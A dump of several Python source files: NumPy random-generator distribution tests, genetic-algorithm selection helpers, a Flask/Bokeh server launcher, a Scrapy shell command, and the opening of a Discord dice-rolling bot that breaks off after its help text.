np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097]) random = Generator(MT19937(self.seed)) actual = random.normal(loc * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.normal, loc * 3, bad_scale) random = Generator(MT19937(self.seed)) normal = random.normal actual = normal(loc, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, normal, loc, bad_scale * 3) def test_beta(self): a = [1] b = [2] bad_a = [-1] bad_b = [-2] desired = 
np.array([0.18719338682602, 0.73234824491364, 0.17928615186455]) random = Generator(MT19937(self.seed)) beta = random.beta actual = beta(a * 3, b) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, beta, bad_a * 3, b) assert_raises(ValueError, beta, a * 3, bad_b) random = Generator(MT19937(self.seed)) actual = random.beta(a, b * 3) assert_array_almost_equal(actual, desired, decimal=14) def test_exponential(self): scale = [1] bad_scale = [-1] desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629]) random = Generator(MT19937(self.seed)) actual = random.exponential(scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.exponential, bad_scale * 3) def test_standard_gamma(self): shape = [1] bad_shape = [-1] desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629]) random = Generator(MT19937(self.seed)) std_gamma = random.standard_gamma actual = std_gamma(shape * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, std_gamma, bad_shape * 3) def test_gamma(self): shape = [1] scale = [2] bad_shape = [-1] bad_scale = [-2] desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258]) random = Generator(MT19937(self.seed)) gamma = random.gamma actual = gamma(shape * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, gamma, bad_shape * 3, scale) assert_raises(ValueError, gamma, shape * 3, bad_scale) random = Generator(MT19937(self.seed)) gamma = random.gamma actual = gamma(shape, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, gamma, bad_shape, scale * 3) assert_raises(ValueError, gamma, shape, bad_scale * 3) def test_f(self): dfnum = [1] dfden = [2] bad_dfnum = [-1] bad_dfden = [-2] desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763]) random = Generator(MT19937(self.seed)) f = random.f actual = f(dfnum * 3, dfden) 
assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, f, bad_dfnum * 3, dfden) assert_raises(ValueError, f, dfnum * 3, bad_dfden) random = Generator(MT19937(self.seed)) f = random.f actual = f(dfnum, dfden * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, f, bad_dfnum, dfden * 3) assert_raises(ValueError, f, dfnum, bad_dfden * 3) def test_noncentral_f(self): dfnum = [2] dfden = [3] nonc = [4] bad_dfnum = [0] bad_dfden = [-1] bad_nonc = [-2] desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629]) random = Generator(MT19937(self.seed)) nonc_f = random.noncentral_f actual = nonc_f(dfnum * 3, dfden, nonc) assert_array_almost_equal(actual, desired, decimal=14) assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3))) assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc) assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc) assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc) random = Generator(MT19937(self.seed)) nonc_f = random.noncentral_f actual = nonc_f(dfnum, dfden * 3, nonc) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc) assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc) assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc) random = Generator(MT19937(self.seed)) nonc_f = random.noncentral_f actual = nonc_f(dfnum, dfden, nonc * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3) assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3) assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3) def test_noncentral_f_small_df(self): random = Generator(MT19937(self.seed)) desired = np.array([0.04714867120827, 0.1239390327694]) actual = random.noncentral_f(0.9, 0.9, 2, size=2) assert_array_almost_equal(actual, desired, decimal=14) def test_chisquare(self): df = [1] bad_df = [-1] desired = 
np.array([0.05573640064251, 1.47220224353539, 2.9469379318589]) random = Generator(MT19937(self.seed)) actual = random.chisquare(df * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.chisquare, bad_df * 3) def test_noncentral_chisquare(self): df = [1] nonc = [2] bad_df = [-1] bad_nonc = [-2] desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399]) random = Generator(MT19937(self.seed)) nonc_chi = random.noncentral_chisquare actual = nonc_chi(df * 3, nonc) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, nonc_chi, bad_df * 3, nonc) assert_raises(ValueError, nonc_chi, df * 3, bad_nonc) random = Generator(MT19937(self.seed)) nonc_chi = random.noncentral_chisquare actual = nonc_chi(df, nonc * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, nonc_chi, bad_df, nonc * 3) assert_raises(ValueError, nonc_chi, df, bad_nonc * 3) def test_standard_t(self): df = [1] bad_df = [-1] desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983]) random = Generator(MT19937(self.seed)) actual = random.standard_t(df * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.standard_t, bad_df * 3) def test_vonmises(self): mu = [2] kappa = [1] bad_kappa = [-1] desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326]) random = Generator(MT19937(self.seed)) actual = random.vonmises(mu * 3, kappa) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa) random = Generator(MT19937(self.seed)) actual = random.vonmises(mu, kappa * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3) def test_pareto(self): a = [1] bad_a = [-1] desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013]) random = Generator(MT19937(self.seed)) actual = random.pareto(a * 3) 
assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.pareto, bad_a * 3) def test_weibull(self): a = [1] bad_a = [-1] desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629]) random = Generator(MT19937(self.seed)) actual = random.weibull(a * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.weibull, bad_a * 3) def test_power(self): a = [1] bad_a = [-1] desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807]) random = Generator(MT19937(self.seed)) actual = random.power(a * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.power, bad_a * 3) def test_laplace(self): loc = [0] scale = [1] bad_scale = [-1] desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202]) random = Generator(MT19937(self.seed)) laplace = random.laplace actual = laplace(loc * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, laplace, loc * 3, bad_scale) random = Generator(MT19937(self.seed)) laplace = random.laplace actual = laplace(loc, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, laplace, loc, bad_scale * 3) def test_gumbel(self): loc = [0] scale = [1] bad_scale = [-1] desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081]) random = Generator(MT19937(self.seed)) gumbel = random.gumbel actual = gumbel(loc * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, gumbel, loc * 3, bad_scale) random = Generator(MT19937(self.seed)) gumbel = random.gumbel actual = gumbel(loc, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, gumbel, loc, bad_scale * 3) def test_logistic(self): loc = [0] scale = [1] bad_scale = [-1] desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397]) random = Generator(MT19937(self.seed)) actual = 
random.logistic(loc * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.logistic, loc * 3, bad_scale) random = Generator(MT19937(self.seed)) actual = random.logistic(loc, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.logistic, loc, bad_scale * 3) assert_equal(random.logistic(1.0, 0.0), 1.0) def test_lognormal(self): mean = [0] sigma = [1] bad_sigma = [-1] desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276]) random = Generator(MT19937(self.seed)) lognormal = random.lognormal actual = lognormal(mean * 3, sigma) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, lognormal, mean * 3, bad_sigma) random = Generator(MT19937(self.seed)) actual = random.lognormal(mean, sigma * 3) assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3) def test_rayleigh(self): scale = [1] bad_scale = [-1] desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499]) random = Generator(MT19937(self.seed)) actual = random.rayleigh(scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.rayleigh, bad_scale * 3) def test_wald(self): mean = [0.5] scale = [1] bad_mean = [0] bad_scale = [-2] desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864]) random = Generator(MT19937(self.seed)) actual = random.wald(mean * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.wald, bad_mean * 3, scale) assert_raises(ValueError, random.wald, mean * 3, bad_scale) random = Generator(MT19937(self.seed)) actual = random.wald(mean, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.wald, bad_mean, scale * 3) assert_raises(ValueError, random.wald, mean, bad_scale * 3) def test_triangular(self): left = [1] right = [3] mode = [2] bad_left_one = [3] bad_mode_one = [4] bad_left_two, bad_mode_two = 
right * 2 desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326]) random = Generator(MT19937(self.seed)) triangular = random.triangular actual = triangular(left * 3, mode, right) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, triangular, bad_left_one * 3, mode, right) assert_raises(ValueError, triangular, left * 3, bad_mode_one, right) assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right) random = Generator(MT19937(self.seed)) triangular = random.triangular actual = triangular(left, mode * 3, right) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, triangular, bad_left_one, mode * 3, right) assert_raises(ValueError, triangular, left, bad_mode_one * 3, right) assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right) random = Generator(MT19937(self.seed)) triangular = random.triangular actual = triangular(left, mode, right * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, triangular, bad_left_one, mode, right * 3) assert_raises(ValueError, triangular, left, bad_mode_one, right * 3) assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3) assert_raises(ValueError, triangular, 10., 0., 20.) assert_raises(ValueError, triangular, 10., 25., 20.) assert_raises(ValueError, triangular, 10., 10., 10.) 
def test_binomial(self): n = [1] p = [0.5] bad_n = [-1] bad_p_one = [-1] bad_p_two = [1.5] desired = np.array([0, 0, 1]) random = Generator(MT19937(self.seed)) binom = random.binomial actual = binom(n * 3, p) assert_array_equal(actual, desired) assert_raises(ValueError, binom, bad_n * 3, p) assert_raises(ValueError, binom, n * 3, bad_p_one) assert_raises(ValueError, binom, n * 3, bad_p_two) random = Generator(MT19937(self.seed)) actual = random.binomial(n, p * 3) assert_array_equal(actual, desired) assert_raises(ValueError, binom, bad_n, p * 3) assert_raises(ValueError, binom, n, bad_p_one * 3) assert_raises(ValueError, binom, n, bad_p_two * 3) def test_negative_binomial(self): n = [1] p = [0.5] bad_n = [-1] bad_p_one = [-1] bad_p_two = [1.5] desired = np.array([0, 2, 1], dtype=np.int64) random = Generator(MT19937(self.seed)) neg_binom = random.negative_binomial actual = neg_binom(n * 3, p) assert_array_equal(actual, desired) assert_raises(ValueError, neg_binom, bad_n * 3, p) assert_raises(ValueError, neg_binom, n * 3, bad_p_one) assert_raises(ValueError, neg_binom, n * 3, bad_p_two) random = Generator(MT19937(self.seed)) neg_binom = random.negative_binomial actual = neg_binom(n, p * 3) assert_array_equal(actual, desired) assert_raises(ValueError, neg_binom, bad_n, p * 3) assert_raises(ValueError, neg_binom, n, bad_p_one * 3) assert_raises(ValueError, neg_binom, n, bad_p_two * 3) def test_poisson(self): lam = [1] bad_lam_one = [-1] desired = np.array([0, 0, 3]) random = Generator(MT19937(self.seed)) max_lam = random._poisson_lam_max bad_lam_two = [max_lam * 2] poisson = random.poisson actual = poisson(lam * 3) assert_array_equal(actual, desired) assert_raises(ValueError, poisson, bad_lam_one * 3) assert_raises(ValueError, poisson, bad_lam_two * 3) def test_zipf(self): a = [2] bad_a = [0] desired = np.array([1, 8, 1]) random = Generator(MT19937(self.seed)) zipf = random.zipf actual = zipf(a * 3) assert_array_equal(actual, desired) assert_raises(ValueError, zipf, 
bad_a * 3) with np.errstate(invalid='ignore'): assert_raises(ValueError, zipf, np.nan) assert_raises(ValueError, zipf, [0, 0, np.nan]) def test_geometric(self): p = [0.5] bad_p_one = [-1] bad_p_two = [1.5] desired = np.array([1, 1, 3]) random = Generator(MT19937(self.seed)) geometric = random.geometric actual = geometric(p * 3) assert_array_equal(actual, desired) assert_raises(ValueError, geometric, bad_p_one * 3) assert_raises(ValueError, geometric, bad_p_two * 3) def test_hypergeometric(self): ngood = [1] nbad = [2] nsample = [2] bad_ngood = [-1] bad_nbad = [-2] bad_nsample_one = [-1] bad_nsample_two = [4] desired = np.array([0, 0, 1]) random = Generator(MT19937(self.seed)) actual = random.hypergeometric(ngood * 3, nbad, nsample) assert_array_equal(actual, desired) assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample) assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample) assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one) assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two) random = Generator(MT19937(self.seed)) actual = random.hypergeometric(ngood, nbad * 3, nsample) assert_array_equal(actual, desired) assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample) assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample) assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one) assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two) random = Generator(MT19937(self.seed)) hypergeom = random.hypergeometric actual = hypergeom(ngood, nbad, nsample * 3) assert_array_equal(actual, desired) assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3) assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3) assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3) assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3) 
assert_raises(ValueError, hypergeom, -1, 10, 20) assert_raises(ValueError, hypergeom, 10, -1, 20) assert_raises(ValueError, hypergeom, 10, 10, -1) assert_raises(ValueError, hypergeom, 10, 10, 25) # ValueError for arguments that are too big. assert_raises(ValueError, hypergeom, 2**30, 10, 20) assert_raises(ValueError, hypergeom, 999, 2**31, 50) assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000) def test_logseries(self): p = [0.5] bad_p_one = [2] bad_p_two = [-1] desired = np.array([1, 1, 1]) random = Generator(MT19937(self.seed)) logseries = random.logseries actual = logseries(p * 3) assert_array_equal(actual, desired) assert_raises(ValueError, logseries, bad_p_one * 3) assert_raises(ValueError, logseries, bad_p_two * 3) def test_multinomial(self): random = Generator(MT19937(self.seed)) actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2)) desired = np.array([[[0, 0, 2, 1, 2, 0], [2, 3, 6, 4, 2, 3]], [[1, 0, 1, 0, 2, 1], [7, 2, 2, 1, 4, 4]], [[0, 2, 0, 1, 2, 0], [3, 2, 3, 3, 4, 5]]], dtype=np.int64) assert_array_equal(actual, desired) random = Generator(MT19937(self.seed)) actual = random.multinomial([5, 20], [1 / 6.] 
* 6) desired = np.array([[0, 0, 2, 1, 2, 0], [2, 3, 6, 4, 2, 3]], dtype=np.int64) assert_array_equal(actual, desired) class TestThread: # make sure each state produces the same sequence even in threads def setup(self): self.seeds = range(4) def check_function(self, function, sz): from threading import Thread out1 = np.empty((len(self.seeds),) + sz) out2 = np.empty((len(self.seeds),) + sz) # threaded generation t = [Thread(target=function, args=(Generator(MT19937(s)), o)) for s, o in zip(self.seeds, out1)] [x.start() for x in t] [x.join() for x in t] # the same serial for s, o in zip(self.seeds, out2): function(Generator(MT19937(s)), o) # these platforms change x87 fpu precision mode in threads if np.intp().dtype.itemsize == 4 and sys.platform == "win32": assert_array_almost_equal(out1, out2) else: assert_array_equal(out1, out2) def test_normal(self): def gen_random(state, out): out[...] = state.normal(size=10000) self.check_function(gen_random, sz=(10000,)) def test_exp(self): def gen_random(state, out): out[...] = state.exponential(scale=np.ones((100, 1000))) self.check_function(gen_random, sz=(100, 1000)) def test_multinomial(self): def gen_random(state, out): out[...] = state.multinomial(10, [1 / 6.] 
* 6, size=10000) self.check_function(gen_random, sz=(10000, 6)) # See Issue #4263 class TestSingleEltArrayInput: def setup(self): self.argOne = np.array([2]) self.argTwo = np.array([3]) self.argThree = np.array([4]) self.tgtShape = (1,) def test_one_arg_funcs(self): funcs = (random.exponential, random.standard_gamma, random.chisquare, random.standard_t, random.pareto, random.weibull, random.power, random.rayleigh, random.poisson, random.zipf, random.geometric, random.logseries) probfuncs = (random.geometric, random.logseries) for func in funcs: if func in probfuncs: # p < 1.0 out = func(np.array([0.5])) else: out = func(self.argOne) assert_equal(out.shape, self.tgtShape) def test_two_arg_funcs(self): funcs = (random.uniform, random.normal, random.beta, random.gamma, random.f, random.noncentral_chisquare, random.vonmises, random.laplace, random.gumbel, random.logistic, random.lognormal, random.wald, random.binomial, random.negative_binomial) probfuncs = (random.binomial, random.negative_binomial) for func in funcs: if func in probfuncs: # p <= 1 argTwo = np.array([0.5]) else: argTwo = self.argTwo out = func(self.argOne, argTwo) assert_equal(out.shape, self.tgtShape) out = func(self.argOne[0], argTwo) assert_equal(out.shape, self.tgtShape) out = func(self.argOne, argTwo[0]) assert_equal(out.shape, self.tgtShape) def test_integers(self, endpoint): itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16, np.int32, np.uint32, np.int64, np.uint64] func = random.integers high = np.array([1]) low = np.array([0]) for dt in itype: out = func(low, high, endpoint=endpoint, dtype=dt) assert_equal(out.shape, self.tgtShape) out = func(low[0], high, endpoint=endpoint, dtype=dt) assert_equal(out.shape, self.tgtShape) out = func(low, high[0], endpoint=endpoint, dtype=dt) assert_equal(out.shape, self.tgtShape) def test_three_arg_funcs(self): funcs = [random.noncentral_f, random.triangular, random.hypergeometric] for func in funcs: out = func(self.argOne, self.argTwo, self.argThree) 
assert_equal(out.shape, self.tgtShape) out = func(self.argOne[0], self.argTwo, self.argThree) assert_equal(out.shape, self.tgtShape) out = func(self.argOne, self.argTwo[0], self.argThree) assert_equal(out.shape, self.tgtShape) @pytest.mark.parametrize("config", JUMP_TEST_DATA) def test_jumped(config): # Each config contains the initial seed, a number of raw steps # the sha256 hashes of the initial and the final states' keys and # the position of of the initial and the final state. # These were produced using the original C implementation. seed = config["seed"] steps = config["steps"] mt19937 = MT19937(seed) # Burn step mt19937.random_raw(steps) key = mt19937.state["state"]["key"] if sys.byteorder == 'big': key = key.byteswap() sha256 = hashlib.sha256(key) assert mt19937.state["state"]["pos"] == config["initial"]["pos"] assert sha256.hexdigest() == config["initial"]["key_sha256"] jumped = mt19937.jumped() key = jumped.state["state"]["key"] if sys.byteorder == 'big': key = key.byteswap() sha256 = hashlib.sha256(key) assert jumped.state["state"]["pos"] == config["jumped"]["pos"] assert sha256.hexdigest() == config["jumped"]["key_sha256"] def test_broadcast_size_error(): mu = np.ones(3) sigma = np.ones((4, 3)) size = (10, 4, 2) assert random.normal(mu, sigma, size=(5, 4, 3)).shape == (5, 4, 3) with pytest.raises(ValueError): random.normal(mu, sigma, size=size) with pytest.raises(ValueError): random.normal(mu, sigma, size=(1, 3)) with pytest.raises(ValueError): random.normal(mu, sigma, size=(4, 1, 1)) # 1 arg shape = np.ones((4, 3)) with pytest.raises(ValueError): random.standard_gamma(shape, size=size) with pytest.raises(ValueError): random.standard_gamma(shape, size=(3,)) with pytest.raises(ValueError): random.standard_gamma(shape, size=3) # Check out out = np.empty(size) with pytest.raises(ValueError): random.standard_gamma(shape, out=out) # 2 arg with pytest.raises(ValueError): random.binomial(1, [0.3, 0.7], size=(2, 1)) with pytest.raises(ValueError): 
random.binomial([1, 2], 0.3, size=(2, 1)) with pytest.raises(ValueError): random.binomial([1, 2], [0.3, 0.7], size=(2, 1)) with pytest.raises(ValueError): random.multinomial([2, 2], [.3, .7], size=(2, 1)) # 3 arg a = random.chisquare(5, size=3) b = random.chisquare(5, size=(4, 3)) c = random.chisquare(5, size=(5, 4, 3)) assert random.noncentral_f(a, b, c).shape == (5, 4, 3) with pytest.raises(ValueError, match=r"Output size \(6, 5, 1, 1\) is"): random.noncentral_f(a, b, c, size=(6, 5, 1, 1)) def test_broadcast_size_scalar(): mu = np.ones(3) sigma = np.ones(3) random.normal(mu, sigma, size=3) with pytest.raises(ValueError): random.normal(mu, sigma, size=2)
utils.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Random-selection helpers for genetic / evolutionary algorithms.

Provides probability-weighted choice (with and without replacement),
Boltzmann (softmax) selection, and small numba-vectorized clamping
utilities used by GA operators.
"""

import threading
import operator
from math import exp
from random import random, randint, gauss, shuffle, choice

import numpy as np
import numba as nb
from scipy.spatial.distance import euclidean
from scipy.special import softmax
from scipy.stats import rv_discrete
from toolz import unique


def binary_select(a, b, p=0.5):
    """Return *a* with probability *p*, otherwise *b*."""
    return a if random() < p else b


def boltzmann_select(xs, fs, T=1):
    """Pick one element of *xs* with softmax(fs / T) probability.

    Higher fitness ``fs[k]`` (and lower temperature *T*) makes ``xs[k]``
    more likely to be chosen.
    """
    ps = softmax(np.array(fs) / T)
    rv = rv_discrete(values=(np.arange(len(xs)), ps))
    return xs[rv.rvs()]


def choice_with_prob(xs, ps, n=1):
    """Draw *n* distinct elements of *xs* without replacement.

    ``ps`` are (unnormalized) selection weights; they are renormalized
    after every draw over the remaining candidates.

    BUG FIX: the original renormalized the caller's array in place
    (``ps /= ...``); we now work on a private float copy.
    """
    ps = np.asarray(ps, dtype=float).copy()
    ps /= np.sum(ps)
    L = len(xs)
    X = np.arange(L)          # indices of the not-yet-selected elements
    ks = []
    for _ in range(n):
        rv = rv_discrete(values=(np.arange(L), ps))
        k = rv.rvs()
        ks.append(X[k])
        # remove the winner and renormalize over the survivors
        X = np.delete(X, k)
        ps = np.delete(ps, k)
        ps /= np.sum(ps)
        L -= 1
    return [xs[k] for k in ks]


def choice_with_prob_replace(xs, ps, n=1):
    """Draw *n* elements of *xs* WITH replacement, weighted by *ps*."""
    ps = np.asarray(ps, dtype=float) / np.sum(ps)
    rv = rv_discrete(values=(np.arange(len(xs)), ps))
    ks = rv.rvs(size=n)
    return [xs[k] for k in ks]


def choice_with_prob_unique(xs, ps, n=1):
    """Draw *n* elements with replacement, then drop duplicate draws.

    May therefore return fewer than *n* elements.
    """
    ps = np.asarray(ps, dtype=float) / np.sum(ps)
    rv = rv_discrete(values=(np.arange(len(xs)), ps))
    ks = unique(rv.rvs(size=n))
    return [xs[k] for k in ks]


def choice_with_fitness(xs, fs=None, n=1, T=1):
    """Select *n* individuals with softmax(fitness / T) weights.

    If *fs* is omitted, each individual's ``.fitness`` attribute is used.

    BUG FIX: the original hard-coded ``n=1`` in the delegated call, so the
    *n* argument was silently ignored.
    """
    if fs is None:
        fs = [x.fitness for x in xs]
    ps = softmax(np.array(fs) / T)
    return choice_with_prob(xs, ps, n=n)


def choice_uniform(xs, n=1):
    """Draw *n* elements of *xs* uniformly at random (with replacement)."""
    ks = np.random.choice(len(xs), n)
    return [xs[k] for k in ks]


def randint2(lb=0, ub=9, ordered=False):
    """Select two different numbers in [lb, ub] randomly.

    Formally i != j ~ U(lb, ub). Applied in GA operations.

    Keyword Arguments:
        lb {number} -- lower bound of interval (default: {0})
        ub {number} -- upper bound of interval (default: {9})
        ordered {bool} -- if True, return the pair sorted ascending

    Returns:
        two distinct numbers
    """
    i = randint(lb, ub)
    d = ub - lb
    # j is drawn from the d values following i and wrapped back into
    # [lb, ub]; this guarantees j != i with a single draw.
    j = randint(i + 1, d + i)
    if j > ub:
        j -= (d + 1)
    if ordered and j < i:
        return j, i
    return i, j


@nb.vectorize()
def max0(x):
    """Elementwise max(x, 0) (a ReLU clamp)."""
    return 0 if x <= 0 else x


def max_lb(lb):
    """Return a vectorized function computing elementwise max(x, lb)."""
    @nb.vectorize()
    def m(x):
        return lb if x <= lb else x
    return m


@nb.vectorize()
def hl(x):
    """Hard-limit x into the unit interval [0, 1]."""
    return 0 if x <= 0 else (1 if x >= 1 else x)


def metropolis_rule(D, T, epsilon=0.000001):
    """Metropolis acceptance criterion.

    Always accept a non-worsening move (D >= 0); accept a worsening move
    (D < 0) with probability exp(D / T). *epsilon* guards against division
    by a zero/negative temperature.
    """
    if D < 0:
        p = exp(D / max(T, epsilon))
        return random() < p
    return True


def proportion(n, total=None):
    """Resolve *n* to an absolute count out of *total*.

    A fractional *n* in (0, 1) is interpreted as a proportion of *total*;
    ``None`` means "all of *total*"; any other value is returned unchanged.

    BUG FIX: the original referenced undefined module globals ``D`` and
    ``N`` (raising NameError on every call) and implicitly returned None.
    NOTE(review): the source appears truncated at this function, so the
    intent is inferred from the visible branches — confirm against callers.
    """
    if n is None:
        if total is None:
            raise ValueError("total is required when n is None")
        n = total
    elif 0 < n < 1:
        if total is None:
            raise ValueError("total is required when n is a proportion")
        n = int(total * n)
    return n
wsgi.py
""" Start Application Sequence: 1) bind sockets for flask to bokeh communications 2) start bokeh server (Tornado) running bokeh bkapp 3) start flask server (Tornado) running flask app """ import time import logging from threading import Thread from server.app import start_tornado from server.bkapp import ( bk_worker, get_sockets ) from server.config import ( BOKEH_URL, FLASK_URL ) logging.basicConfig(level=logging.INFO) log = logging.getLogger(__name__) t2 = Thread(target=start_tornado, daemon=True) t2.start() # get sockets, so bkapp and app can talk bk_sockets, bk_port = get_sockets() # start bokeh sever t1 = Thread(target=bk_worker, args=[bk_sockets, bk_port], daemon=True) t1.start() bokeh_url = BOKEH_URL.replace('$PORT', str(bk_port)) log.info("Bokeh Server App Running at: %s", bokeh_url) # start flask server log.info("Flask + Bokeh Server App Running at: %s", FLASK_URL) # loop for ever while True: time.sleep(0.05)
shell.py
""" Scrapy Shell See documentation in docs/topics/shell.rst """ from threading import Thread from scrapy.command import ScrapyCommand from scrapy.shell import Shell class Command(ScrapyCommand): requires_project = False default_settings = {'KEEP_ALIVE': True, 'LOGSTATS_INTERVAL': 0} def syntax(self): return "[url|file]" def short_desc(self): return "Interactive scraping console" def long_desc(self): return "Interactive console for scraping the given url" def add_options(self, parser): ScrapyCommand.add_options(self, parser) parser.add_option("-c", dest="code", help="evaluate the code in the shell, print the result and exit") parser.add_option("--spider", dest="spider", help="use this spider") def update_vars(self, vars): """You can use this function to update the Scrapy objects that will be available in the shell """ pass def run(self, args, opts): crawler = self.crawler_process.create_crawler() url = args[0] if args else None spider = crawler.spiders.create(opts.spider) if opts.spider else None self.crawler_process.start_crawling() self._start_crawler_thread() shell = Shell(crawler, update_vars=self.update_vars, code=opts.code) shell.start(url=url, spider=spider) def _start_crawler_thread(self): t = Thread(target=self.crawler_process.start_reactor) t.daemon = True t.start()
tymora.py
#!/usr/bin/env python3
"""Tymora: a Discord dice bot evaluating complex dice expressions and
simulating a Deck of Many Things.  Commands are dispatched in on_message;
heavyweight evaluation is pushed to a subprocess with a timeout so a
malicious expression cannot hang the bot.
"""
import discord
import asyncio
import sys
from concurrent.futures import ProcessPoolExecutor
from multiprocessing import Process, Pipe

from complex_dice import *
from deck_of_many_things import *

# NOTE(review): the original help text's line breaks were reconstructed;
# the wording is unchanged.
HELP_STR = """
Hi, I'm Tymora! I evaluate complex dice expressions that have absolutely no use whatsoever!
These complex expressions are built out of numbers and operators, like mathematical expressions.
**The `.roll` Command**
General rules:
- Operators are infix, and are evaluated in decreasing order of precedence.
- If an operator gets a list where it expects a number, it uses the sum of the list.
- If an operator gets a number where it expects a list, it treats the number as a single-element list.
Operators:
In these descriptions, `a` refers to the left argument, and `b` refers to the right argument.
- `d`: Rolls `a` `b`-sided dice, and returns the sum. Precedence 4.
- `r`: Rerolls any `b`s in `a`, once. Precedence 3.
- `R`: Rerolls any `b`s in `a`, repeatedly, until no `b`s remain. Precedence 3.
- `t`: Takes the `b` lowest values from `a`. Precedence 3.
- `T`: Takes the `b` highest values from `a`. Precedence 3.
- `*`: Multiplies `a` and `b`. Precedence 2.
- `/`: Divides `a` by `b`, flooring the result. Precedence 2.
- `+`: Adds `a` and `b`. Precedence 1.
- `-`: Subtracts `b` from `a`. Precedence 1.
- `.`: Concatenates `a` and `b`. Precedence 1.
- `_`: Removes all elements in `b` from `a`. Precedence 1.
- `?`: Evaluates `b` if `a` is greater than 0, else returns 0. Precedence 0.
**Other Commands**
- `.count`: rolls a simple dice expression (`adb`), and counts how many of each number you get.
- `.help`: Sends you this help text in a DM.
- `.draw <ID>`: Draws a card from a Deck of Many Things with the specified ID.
- `.initdeck <ID> <1|0>: Initializes a Deck of Many Things with the specified ID.""" + \
    """ The second argument is 1 if a 22-card deck is to be used; otherwise 0."""

# Easter-egg response for the `0d0` roll.
ZALGO_STR = \
